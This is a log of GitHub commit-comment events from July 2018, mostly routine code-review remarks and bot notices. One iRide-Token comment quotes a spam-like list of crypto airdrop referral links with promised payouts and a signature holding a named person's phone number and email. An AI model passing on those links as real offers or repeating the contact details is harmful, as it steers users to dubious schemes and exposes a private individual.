{"id":"8033143047","type":"CommitCommentEvent","actor":{"login":"cocoitali"},"repo":{"name":"cocoitali/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29871613,"position":null,"line":null,"path":null,"commit_id":"7dfd99558dee5d1ad769c02f59b6ab1efe192f41","created_at":"2018-07-29T00:46:56Z","updated_at":"2018-07-29T00:46:56Z","author_association":"OWNER","body":"Made changes after allotted time for sprint challenge. Completed Task 3 and most of Task 4. Now for the about.html layout and stretch goals! "}},"created_at":"2018-07-29T00:46:56Z"}
{"id":"8033143870","type":"CommitCommentEvent","actor":{"login":"tecminiMDT"},"repo":{"name":"tecminiMDT/Arduino-tests"},"payload":{"comment":{"id":29871614,"position":null,"line":null,"path":null,"commit_id":"3e38dacdb98fe3209cbd60ec42e0def7c583855d","created_at":"2018-07-29T00:48:02Z","updated_at":"2018-07-29T00:48:02Z","author_association":"OWNER","body":"wow, i can't believe how much Git sucks! could they have made it any more stupidly confusing? And to think developers complained about Perforce. Dang RIP Perforce, welcome to the new race to the bottom."}},"created_at":"2018-07-29T00:48:02Z"}
{"id":"8033143898","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/hello-world"},"payload":{"comment":{"id":29871615,"position":null,"line":null,"path":null,"commit_id":"856dd243d19af1a16b90690b33c76f31f18ac76a","created_at":"2018-07-29T00:48:04Z","updated_at":"2018-07-29T00:48:04Z","author_association":"OWNER","body":"No so hard"}},"created_at":"2018-07-29T00:48:04Z"}
{"id":"8033143922","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"JuliaOpt/JuMP.jl"},"payload":{"comment":{"id":29871616,"position":9,"line":10,"path":".github/CONTRIBUTING.md","commit_id":"5dcba3c4e8e4793b2b723e23fb693438ef5e58b7","created_at":"2018-07-29T00:48:06Z","updated_at":"2018-07-29T00:48:06Z","author_association":"MEMBER","body":"This last sentence is a bit of a downer. Can we just drop it? The code of conduct already discusses the community stewards."}},"created_at":"2018-07-29T00:48:06Z"}
{"id":"8033145192","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"JuliaOpt/JuMP.jl"},"payload":{"comment":{"id":29871621,"position":null,"line":null,"path":null,"commit_id":"5dcba3c4e8e4793b2b723e23fb693438ef5e58b7","created_at":"2018-07-29T00:49:29Z","updated_at":"2018-07-29T00:49:29Z","author_association":"MEMBER","body":"The code of conduct and the contributing guide should both be in the same directory. Either the root or `.github` seems fine to me."}},"created_at":"2018-07-29T00:49:29Z"}
{"id":"8033145510","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"JuliaOpt/JuMP.jl"},"payload":{"comment":{"id":29871625,"position":8,"line":37,"path":"CODE_OF_CONDUCT.md","commit_id":"5dcba3c4e8e4793b2b723e23fb693438ef5e58b7","created_at":"2018-07-29T00:49:53Z","updated_at":"2018-07-29T00:49:53Z","author_association":"MEMBER","body":"Is there a way to use relative links instead of pointing to the master branch?"}},"created_at":"2018-07-29T00:49:53Z"}
{"id":"8033146978","type":"CommitCommentEvent","actor":{"login":"odow"},"repo":{"name":"JuliaOpt/JuMP.jl"},"payload":{"comment":{"id":29871630,"position":null,"line":null,"path":null,"commit_id":"5dcba3c4e8e4793b2b723e23fb693438ef5e58b7","created_at":"2018-07-29T00:51:29Z","updated_at":"2018-07-29T00:51:29Z","author_association":"MEMBER","body":"Github [says](https://help.github.com/articles/setting-guidelines-for-repository-contributors/) it needs to be in `docs` or `.github`"}},"created_at":"2018-07-29T00:51:29Z"}
{"id":"8033147846","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"JuliaOpt/JuMP.jl"},"payload":{"comment":{"id":29871631,"position":null,"line":null,"path":null,"commit_id":"5dcba3c4e8e4793b2b723e23fb693438ef5e58b7","created_at":"2018-07-29T00:52:28Z","updated_at":"2018-07-29T00:52:28Z","author_association":"MEMBER","body":"\"your project repository's root, docs, or .github folder.\""}},"created_at":"2018-07-29T00:52:28Z"}
{"id":"8033148357","type":"CommitCommentEvent","actor":{"login":"odow"},"repo":{"name":"JuliaOpt/JuMP.jl"},"payload":{"comment":{"id":29871633,"position":null,"line":null,"path":null,"commit_id":"5dcba3c4e8e4793b2b723e23fb693438ef5e58b7","created_at":"2018-07-29T00:52:59Z","updated_at":"2018-07-29T00:52:59Z","author_association":"MEMBER","body":"I'm blind..."}},"created_at":"2018-07-29T00:52:59Z"}
{"id":"8033153123","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29871648,"position":null,"line":null,"path":null,"commit_id":"cd859e4c7001c69ca2a949ccef8e791662a41ecb","created_at":"2018-07-29T00:58:22Z","updated_at":"2018-07-29T00:58:22Z","author_association":"CONTRIBUTOR","body":"dunno, it just started working"}},"created_at":"2018-07-29T00:58:22Z"}
{"id":"8033165441","type":"CommitCommentEvent","actor":{"login":"ElioLy"},"repo":{"name":"ElioLy/Hello-world"},"payload":{"comment":{"id":29871680,"position":null,"line":null,"path":null,"commit_id":"f8251891f939a155b72fe47e5b8f4d1c103bb999","created_at":"2018-07-29T01:11:50Z","updated_at":"2018-07-29T01:11:50Z","author_association":"OWNER","body":"I'm glad to be here, let's move on together!"}},"created_at":"2018-07-29T01:11:50Z"}
{"id":"8033166256","type":"CommitCommentEvent","actor":{"login":"everaldo"},"repo":{"name":"HeeL/scrollinity"},"payload":{"comment":{"id":29871684,"position":null,"line":null,"path":null,"commit_id":"4eb87b7544e38d594e3b0c7891cab94652393922","created_at":"2018-07-29T01:12:46Z","updated_at":"2018-07-29T01:12:46Z","author_association":"NONE","body":"@fredngo , could you please update it on Rubygems? Thanks!"}},"created_at":"2018-07-29T01:12:46Z"}
{"id":"8033168168","type":"CommitCommentEvent","actor":{"login":"GaalexxC"},"repo":{"name":"GaalexxC/IPS-4.2-BitTracker"},"payload":{"comment":{"id":29871689,"position":null,"line":null,"path":null,"commit_id":"b4a80c0f4e43e750084067cf0aeb135ef0bcb4ce","created_at":"2018-07-29T01:14:55Z","updated_at":"2018-07-29T01:14:55Z","author_association":"OWNER","body":"My Bad"}},"created_at":"2018-07-29T01:14:55Z"}
{"id":"8033182938","type":"CommitCommentEvent","actor":{"login":"janicduplessis"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29871741,"position":84,"line":90,"path":"local-cli/util/Config.js","commit_id":"a32620dc3b7a0ebd53feeaf7794051705d80f49e","created_at":"2018-07-29T01:30:34Z","updated_at":"2018-07-29T01:30:34Z","author_association":"COLLABORATOR","body":"@CompuIves This causes an issue since there seems to be no way to override the default config (ie `blacklistRE`) from my project's metro config. The RN default values are always be used. "}},"created_at":"2018-07-29T01:30:34Z"}
{"id":"8033188453","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29871755,"position":14,"line":843,"path":"wiki/plugins/metadata/models.py","commit_id":"efc9a4b05c459a4f88bc00b2fd5bd917a235aa0c","created_at":"2018-07-29T01:36:24Z","updated_at":"2018-07-29T01:36:24Z","author_association":"CONTRIBUTOR","body":"Why reduce the size for corpus descriptions?"}},"created_at":"2018-07-29T01:36:24Z"}
{"id":"8033195204","type":"CommitCommentEvent","actor":{"login":"DouglasDeveloperApp"},"repo":{"name":"DouglasDeveloperApp/SpringBoot-MongoDB"},"payload":{"comment":{"id":29871771,"position":null,"line":null,"path":null,"commit_id":"b69b05b242151a83dbccac1592cda3b2a5b771f9","created_at":"2018-07-29T01:43:28Z","updated_at":"2018-07-29T01:43:28Z","author_association":"OWNER","body":"Buscar posts contendo um dado string em qualquer lugar (no título, corpo ou comentários) e em um dado intervalo de datas"}},"created_at":"2018-07-29T01:43:28Z"}
{"id":"8033196691","type":"CommitCommentEvent","actor":{"login":"DouglasDeveloperApp"},"repo":{"name":"DouglasDeveloperApp/SpringBoot-MongoDB"},"payload":{"comment":{"id":29871782,"position":null,"line":null,"path":null,"commit_id":"f2293e388c28bbe6bd28bf19eb52ddce87cee9f6","created_at":"2018-07-29T01:45:00Z","updated_at":"2018-07-29T01:45:00Z","author_association":"OWNER","body":"Buscar posts contendo um dado string no título.\r\n\r\nReferências:  \r\n                    https://docs.spring.io/spring-data/mongodb/docs/current/reference/html/ \r\n                    https://docs.spring.io/spring-data/data-document/docs/current/reference/html/  \r\n                    https://docs.mongodb.com/manual/reference/operator/query/regex/ "}},"created_at":"2018-07-29T01:45:00Z"}
{"id":"8033197837","type":"CommitCommentEvent","actor":{"login":"DouglasDeveloperApp"},"repo":{"name":"DouglasDeveloperApp/SpringBoot-MongoDB"},"payload":{"comment":{"id":29871786,"position":null,"line":null,"path":null,"commit_id":"4d32e4b0e77e6f6bc601f645e320affa43bbbf84","created_at":"2018-07-29T01:46:09Z","updated_at":"2018-07-29T01:46:09Z","author_association":"OWNER","body":" Buscar posts contendo um dado string no título.\r\n\r\nReferências: \r\nhttps://docs.spring.io/spring-data/mongodb/docs/current/reference/html/  \r\nhttps://docs.spring.io/spring-data/data-document/docs/current/reference/html/ "}},"created_at":"2018-07-29T01:46:09Z"}
{"id":"8033198670","type":"CommitCommentEvent","actor":{"login":"keener101"},"repo":{"name":"keener101/keener101.github.io"},"payload":{"comment":{"id":29871788,"position":null,"line":null,"path":null,"commit_id":"dc21e957a1f68ac4874d1a8c68d274640b1c942d","created_at":"2018-07-29T01:47:05Z","updated_at":"2018-07-29T01:47:05Z","author_association":"OWNER","body":"changed themes"}},"created_at":"2018-07-29T01:47:05Z"}
{"id":"8033198763","type":"CommitCommentEvent","actor":{"login":"DouglasDeveloperApp"},"repo":{"name":"DouglasDeveloperApp/SpringBoot-MongoDB"},"payload":{"comment":{"id":29871789,"position":null,"line":null,"path":null,"commit_id":"3102d092b1a052bcc67f9075e17862665ef3a39f","created_at":"2018-07-29T01:47:12Z","updated_at":"2018-07-29T01:47:12Z","author_association":"OWNER","body":"Referências: \r\n https://pt.stackoverflow.com/questions/31362/o-que-é-um-dto \r\n\r\n DTO (Data Transfer Object): é um objeto que tem o papel de carregar dados das entidades de forma simples, podendo inclusive \"projetar\" apenas alguns dados da entidade original. Vantagens: \r\n - Otimizar o tráfego (trafegando menos dados) \r\n - Evitar que dados de interesse exclusivo do sistema fiquem sendo expostos (por exemplo: senhas, dados de auditoria como data de criação e data de atualização do objeto, etc.) \r\n - Customizar os objetos trafegados conforme a necessidade de cada requisição (por exemplo: para alterar um produto, você precisa dos dados A, B e C; já para listar os produtos, eu preciso dos dados A, B e a categoria de cada produto, etc.). "}},"created_at":"2018-07-29T01:47:12Z"}
{"id":"8033199726","type":"CommitCommentEvent","actor":{"login":"DouglasDeveloperApp"},"repo":{"name":"DouglasDeveloperApp/SpringBoot-MongoDB"},"payload":{"comment":{"id":29871790,"position":null,"line":null,"path":null,"commit_id":"ace26d037d9695a0a314657e1c2b410e01ae5dda","created_at":"2018-07-29T01:48:15Z","updated_at":"2018-07-29T01:48:15Z","author_association":"OWNER","body":"Referências: \r\nhttps://docs.spring.io/spring-boot/docs/current/reference/html/common-application-properties.html  https://docs.spring.io/spring-boot/docs/current/reference/html/boot-features-nosql.html  https://stackoverflow.com/questions/38921414/mongodb-what-are-the-default-user-and-password "}},"created_at":"2018-07-29T01:48:15Z"}
{"id":"8033201426","type":"CommitCommentEvent","actor":{"login":"temperdia"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29871802,"position":null,"line":null,"path":null,"commit_id":"31e652dbd25ffe42c71191fd44cff07216c41b72","created_at":"2018-07-29T01:50:08Z","updated_at":"2018-07-29T01:50:08Z","author_association":"NONE","body":"it doesn`t work somebody help me ? "}},"created_at":"2018-07-29T01:50:08Z"}
{"id":"8033201959","type":"CommitCommentEvent","actor":{"login":"rvillage"},"repo":{"name":"rvillage/gemtest"},"payload":{"comment":{"id":29871803,"position":5,"line":7,"path":"Gemfile","commit_id":"fdfa91e3509eddfbc9a453e90129541af4047ad7","created_at":"2018-07-29T01:50:42Z","updated_at":"2018-07-29T01:50:42Z","author_association":"OWNER","body":"行末には改行を入れてください"}},"created_at":"2018-07-29T01:50:42Z"}
{"id":"8033202147","type":"CommitCommentEvent","actor":{"login":"KrisselCavazos"},"repo":{"name":"CompleteBlenderCreator/01-Introduction-And-Setup"},"payload":{"comment":{"id":29871804,"position":null,"line":null,"path":null,"commit_id":"06130d268e8c6f33cd3bd8379e1cb4ff21595b31","created_at":"2018-07-29T01:50:52Z","updated_at":"2018-07-29T01:50:52Z","author_association":"NONE","body":"Hi Guys! Let's give our best ;)"}},"created_at":"2018-07-29T01:50:52Z"}
{"id":"8033204824","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"pkgw/slurm-rs"},"payload":{"comment":{"id":29871811,"position":null,"line":null,"path":null,"commit_id":"9b6a4f3dfd7a428341f42891b354277d199c7864","created_at":"2018-07-29T01:54:02Z","updated_at":"2018-07-29T01:54:02Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #1 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-29T01:54:02Z"}
{"id":"8033204937","type":"CommitCommentEvent","actor":{"login":"taneliang"},"repo":{"name":"leeyjjoel/Aquarius"},"payload":{"comment":{"id":29871812,"position":1,"line":1,"path":"gridserver/index.js","commit_id":"b5072932763c4f089ca73bdd0a56ae25dffad3dc","created_at":"2018-07-29T01:54:09Z","updated_at":"2018-07-29T01:54:09Z","author_association":"COLLABORATOR","body":"Should avoid `var` as much as possible. Try to use `const` or `let` instead. You'll almost always use `const` for `require` since you'll almost never need to reassign it."}},"created_at":"2018-07-29T01:54:09Z"}
{"id":"8033206281","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"pkgw/slurm-rs"},"payload":{"comment":{"id":29871817,"position":null,"line":null,"path":null,"commit_id":"dadb5e314ca806d9344534bf7b5f0a26175adefd","created_at":"2018-07-29T01:55:38Z","updated_at":"2018-07-29T01:55:38Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #2 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-29T01:55:38Z"}
{"id":"8033206594","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"pkgw/slurm-rs"},"payload":{"comment":{"id":29871818,"position":null,"line":null,"path":null,"commit_id":"fe34fa696acd31251a0d4bb962db2d63902225d3","created_at":"2018-07-29T01:55:58Z","updated_at":"2018-07-29T01:55:58Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #3 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-29T01:55:58Z"}
{"id":"8033206931","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"pkgw/slurm-rs"},"payload":{"comment":{"id":29871819,"position":null,"line":null,"path":null,"commit_id":"20d5e7db2104048c84d3fb755aa7cd506b0bdcda","created_at":"2018-07-29T01:56:17Z","updated_at":"2018-07-29T01:56:17Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #4 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-29T01:56:17Z"}
{"id":"8033206967","type":"CommitCommentEvent","actor":{"login":"taneliang"},"repo":{"name":"leeyjjoel/Aquarius"},"payload":{"comment":{"id":29871820,"position":null,"line":null,"path":null,"commit_id":"b5072932763c4f089ca73bdd0a56ae25dffad3dc","created_at":"2018-07-29T01:56:20Z","updated_at":"2018-07-29T01:56:20Z","author_association":"COLLABORATOR","body":"Your new implementation of `gridIDForLocation` doesn't return anything. Are you sure the API still works?"}},"created_at":"2018-07-29T01:56:20Z"}
{"id":"8033716899","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873609,"position":37,"line":37,"path":"src/main/java/com/spockatone/spock/service/UserService.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T10:00:17Z","updated_at":"2018-07-29T10:00:17Z","author_association":"COLLABORATOR","body":":duck: "}},"created_at":"2018-07-29T10:00:17Z"}
{"id":"8033717077","type":"CommitCommentEvent","actor":{"login":"pankaj28843"},"repo":{"name":"zoeyzou/hyf-homework"},"payload":{"comment":{"id":29873617,"position":23,"line":23,"path":"JavaScript-2/week6/homework/homework.js","commit_id":"3bf6d65e0c441b55cab352195a86e9a98768411d","created_at":"2018-07-29T10:00:24Z","updated_at":"2018-07-29T10:00:24Z","author_association":"NONE","body":"It should say, \"We could find any search result for your query, please try to search for something else\"."}},"created_at":"2018-07-29T10:00:24Z"}
{"id":"8033718252","type":"CommitCommentEvent","actor":{"login":"rosso357"},"repo":{"name":"rosso357/GranbuleBot"},"payload":{"comment":{"id":29873619,"position":null,"line":null,"path":null,"commit_id":"fd03fce733771d930e1e61f25dda4ed017e91084","created_at":"2018-07-29T10:01:15Z","updated_at":"2018-07-29T10:01:15Z","author_association":"OWNER","body":"#16 メンションされた時だけbotが反応  するように修正しました"}},"created_at":"2018-07-29T10:01:15Z"}
{"id":"8033718581","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873620,"position":13,"line":13,"path":"src/main/java/com/spockatone/spock/service/security/SecurityService.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T10:01:32Z","updated_at":"2018-07-29T10:01:32Z","author_association":"COLLABORATOR","body":"Почему нельзя блять сделать по нормальному?!!!!! Это минута времени!! !!!!11111\r\nСКОЛЬКО БЛЯТЬ МОЖНО ТЕРПЕТЬ ОТСУТСТВИЕ ПРОПЕРТЕЙ И ЕБА_НЫЙ_КЕЙС ДЛЯ НЕ КОНСТАНТ?!!!!1111"}},"created_at":"2018-07-29T10:01:32Z"}
{"id":"8033718979","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873623,"position":22,"line":22,"path":"src/main/java/com/spockatone/spock/service/security/SecurityService.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T10:01:51Z","updated_at":"2018-07-29T10:01:51Z","author_association":"COLLABORATOR","body":"вот это хороший метод"}},"created_at":"2018-07-29T10:01:51Z"}
{"id":"8033719496","type":"CommitCommentEvent","actor":{"login":"dhirschfeld"},"repo":{"name":"jupyterhub/ldapauthenticator"},"payload":{"comment":{"id":29873625,"position":8,"line":308,"path":"ldapauthenticator/ldapauthenticator.py","commit_id":"4814984a8bec6edbcc06aec883bdfd2b44c088db","created_at":"2018-07-29T10:02:15Z","updated_at":"2018-07-29T10:02:15Z","author_association":"COLLABORATOR","body":"Agreed, `re.sub` is more appropriate. A PR to make this change would be accepted!"}},"created_at":"2018-07-29T10:02:15Z"}
{"id":"8033719618","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873626,"position":18,"line":18,"path":"src/main/java/com/spockatone/spock/service/security/Session.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T10:02:20Z","updated_at":"2018-07-29T10:02:20Z","author_association":"COLLABORATOR","body":"используется где то?"}},"created_at":"2018-07-29T10:02:20Z"}
{"id":"8033720692","type":"CommitCommentEvent","actor":{"login":"DonVito65"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29873633,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-29T10:03:12Z","updated_at":"2018-07-29T10:03:12Z","author_association":"NONE","body":"Hello,\nMeanwhile, thanks for the list you send me and for advice on airdrops.\nIf I can on these days I'll send you some links too.\nI wanted to ask you something about Avinoc, the first on the list you\nsent me. Yesterday I did all the pasaggi and I arrived at 308 dollars.\nBut today on the page of Avinoc I can not find anything and had not\nmade me open an account. Where do I find all my dashboard?\nThank you\nVD\n\n\nIl giorno dom 29 lug 2018 alle ore 06:22 sirathashimi <\nnotifications@github.com> ha scritto:\n\n> List of Airdrops\n>\n> Avinoc - Aviation Network Operation Chain ($300+)\n> https://www.avinoc.com/r/Xa4hvUactw9o\n>\n> CoTrader - Trading Platform ($20)\n> https://t.me/CoTraderReferralBot?start=568459030\n>\n> ETHX - Global Crypto to Fiat Exchange ($2.5)\n> https://ethx.co/u/?ref=SIRAT353093\n>\n> Gapro - $500\n> https://www.gapro.io/u/ref/sirathashimi\n>\n> Gift.ONE - Biggest Airdrop Organization, win free Gift, Btc, and Eth\n> everyday. ($20)\n> https://gift.one/i/t8I9th\n>\n> KnowChain - ($25)\n> http://telegram.me/knowchain_airdrop_bot?start=568459030\n>\n> Oodlebit - Crypto Exchange ($50+)\n> https://oodltrack.com/tracker.php?affid=77&l=0\n>\n> OpuLabs - Skincare ($60)\n> https://opu.ai/signup/uLIyZ34P119330\n>\n> The Marine Project - ($180)\n> t.me/marine_bounty_bot?start=5b5a8c582a601e0054aac318\n>\n> Unboxed - ($570+)\n> https://unboxed.network/c/b45087\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29872280>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/An0eU0ItpzkPuWyipA_QR0lIdncXzpjnks5uLTiIgaJpZM4VaEAl>\n> .\n>\n\n\n-- \nVito Donzelli\nConsigliere Nazionale FICEC - Federazione Italiana Cheerleading E Cheerdance\nhttp://www.ficec.it   -   vito.donzelli@ficec.it\nConsigliere Provinciale CSI Palermo - Centro Sportivo Italiano\nhttp://www.csipalermo.it  -\nConsigliere Asd Subbuteo Club Palermo\nhttps://www.facebook.com/subbuteopalermo2016/\n\nTel. 3200449759\n"}},"created_at":"2018-07-29T10:03:12Z"}
{"id":"8033721456","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873634,"position":38,"line":38,"path":"src/main/java/com/spockatone/spock/web/servlet/security/LoginServlet.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T10:03:50Z","updated_at":"2018-07-29T10:03:50Z","author_association":"COLLABORATOR","body":"дай угадаю, буквы на странице только английские"}},"created_at":"2018-07-29T10:03:50Z"}
{"id":"8033721995","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873635,"position":63,"line":63,"path":"src/main/java/com/spockatone/spock/web/servlet/security/LoginServlet.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T10:04:18Z","updated_at":"2018-07-29T10:04:18Z","author_association":"COLLABORATOR","body":":crying_cat_face: "}},"created_at":"2018-07-29T10:04:18Z"}
{"id":"8033722558","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873636,"position":70,"line":70,"path":"src/main/java/com/spockatone/spock/web/servlet/security/LoginServlet.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T10:04:50Z","updated_at":"2018-07-29T10:04:50Z","author_association":"COLLABORATOR","body":"может не будем сессии в сервлете создавать"}},"created_at":"2018-07-29T10:04:50Z"}
{"id":"8033722685","type":"CommitCommentEvent","actor":{"login":"jreback"},"repo":{"name":"pandas-dev/pandas"},"payload":{"comment":{"id":29873637,"position":5,"line":700,"path":"pandas/tests/extension/integer/test_integer.py","commit_id":"5e8c1a4370b3bf8b6e350f61644dd46c4640c72b","created_at":"2018-07-29T10:04:56Z","updated_at":"2018-07-29T10:04:56Z","author_association":"CONTRIBUTOR","body":"you should not need this\r\nyou must have a conversion path that does not force this to int64 internally (as it does currently)"}},"created_at":"2018-07-29T10:04:56Z"}
{"id":"8033722982","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873641,"position":5,"line":5,"path":"src/main/resources/templates/login.html","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T10:05:12Z","updated_at":"2018-07-29T10:05:12Z","author_association":"COLLABORATOR","body":"велком пейдж"}},"created_at":"2018-07-29T10:05:12Z"}
{"id":"8033723239","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873644,"position":20,"line":20,"path":"src/main/resources/templates/login.html","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T10:05:23Z","updated_at":"2018-07-29T10:05:23Z","author_association":"COLLABORATOR","body":"нахуя ../ ?"}},"created_at":"2018-07-29T10:05:23Z"}
{"id":"8033723246","type":"CommitCommentEvent","actor":{"login":"Levitanious"},"repo":{"name":"Levitanious/tempest-cms"},"payload":{"comment":{"id":29873645,"position":39,"line":294,"path":"main.py","commit_id":"b1381f80b4a2830540a4800f87c537c094a4f79f","created_at":"2018-07-29T10:05:24Z","updated_at":"2018-07-29T10:05:24Z","author_association":"OWNER","body":"> TL;DR checking ANY input from clients (`character_id`) is totally welcomed for.\r\n\r\nIt's one of these days when you're extra paranoid and you do a random character_id type check to find that Tornado has a weird bug, or your regexp ended up being subtly exploitable...\r\n\r\nHaving to check for expected values helps to avoid those.\r\nI don't see a problem with this particular part you have here, but just sayin' `:3`"}},"created_at":"2018-07-29T10:05:24Z"}
{"id":"8033723399","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873647,"position":20,"line":20,"path":"src/main/resources/templates/login.html","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T10:05:32Z","updated_at":"2018-07-29T10:05:32Z","author_association":"COLLABORATOR","body":"почему нет href?"}},"created_at":"2018-07-29T10:05:32Z"}
{"id":"8033724216","type":"CommitCommentEvent","actor":{"login":"Levitanious"},"repo":{"name":"Levitanious/tempest-cms"},"payload":{"comment":{"id":29873652,"position":null,"line":null,"path":null,"commit_id":"b1381f80b4a2830540a4800f87c537c094a4f79f","created_at":"2018-07-29T10:06:14Z","updated_at":"2018-07-29T10:06:14Z","author_association":"OWNER","body":"Overall, me likes. Good job, my man."}},"created_at":"2018-07-29T10:06:14Z"}
{"id":"8033727068","type":"CommitCommentEvent","actor":{"login":"jorisvandenbossche"},"repo":{"name":"pandas-dev/pandas"},"payload":{"comment":{"id":29873661,"position":5,"line":700,"path":"pandas/tests/extension/integer/test_integer.py","commit_id":"5e8c1a4370b3bf8b6e350f61644dd46c4640c72b","created_at":"2018-07-29T10:08:46Z","updated_at":"2018-07-29T10:08:46Z","author_association":"MEMBER","body":"as far as I understand the appveyor output, it is actually *not* forced to int64. The `expected` had int32 type before, but `result` will have int64 (converted from float64) "}},"created_at":"2018-07-29T10:08:46Z"}
{"id":"8033727636","type":"CommitCommentEvent","actor":{"login":"jorisvandenbossche"},"repo":{"name":"pandas-dev/pandas"},"payload":{"comment":{"id":29873662,"position":5,"line":700,"path":"pandas/tests/extension/integer/test_integer.py","commit_id":"5e8c1a4370b3bf8b6e350f61644dd46c4640c72b","created_at":"2018-07-29T10:09:13Z","updated_at":"2018-07-29T10:09:13Z","author_association":"MEMBER","body":"so therefore forcing `expected` to int64 as well"}},"created_at":"2018-07-29T10:09:13Z"}
{"id":"8033729655","type":"CommitCommentEvent","actor":{"login":"znarf"},"repo":{"name":"opencollective/eslint-config-opencollective"},"payload":{"comment":{"id":29873663,"position":93,"line":71,"path":"index.js","commit_id":"35c2389edcd6fd12f6b7b560d0974e8fa70c4ce4","created_at":"2018-07-29T10:10:52Z","updated_at":"2018-07-29T10:10:52Z","author_association":"CONTRIBUTOR","body":"It's best practice to settle on one quotes style for consistency, and picking single quotes is the most common in the javascript world.\r\n\r\nMaybe what you want is the `\"avoidEscape\": true` option:\r\n\r\n> `allows strings to use single-quotes or double-quotes so long as the string contains a quote that would have to be escaped otherwise`"}},"created_at":"2018-07-29T10:10:52Z"}
{"id":"8033729738","type":"CommitCommentEvent","actor":{"login":"jorisvandenbossche"},"repo":{"name":"pandas-dev/pandas"},"payload":{"comment":{"id":29873664,"position":5,"line":700,"path":"pandas/tests/extension/integer/test_integer.py","commit_id":"5e8c1a4370b3bf8b6e350f61644dd46c4640c72b","created_at":"2018-07-29T10:10:56Z","updated_at":"2018-07-29T10:10:56Z","author_association":"MEMBER","body":"That said, if a non-numpy array is passed to eg `Series`, do we force it to always be int64? Or is it platform dependent? \r\nIf it is always int64, it might makes sense to do that for IntegerArray as well (`coerce_array` currently follows numpy list coercing behaviour)"}},"created_at":"2018-07-29T10:10:56Z"}
{"id":"8033730538","type":"CommitCommentEvent","actor":{"login":"ButcherV"},"repo":{"name":"ButcherV/Vue-study"},"payload":{"comment":{"id":29873668,"position":11,"line":11,"path":"vue-tab.html","commit_id":"19647c0e77daec7b909975c41674221d7de324ca","created_at":"2018-07-29T10:11:37Z","updated_at":"2018-07-29T10:11:37Z","author_association":"OWNER","body":"这里用 li，而子元素用 div，不太合理。"}},"created_at":"2018-07-29T10:11:37Z"}
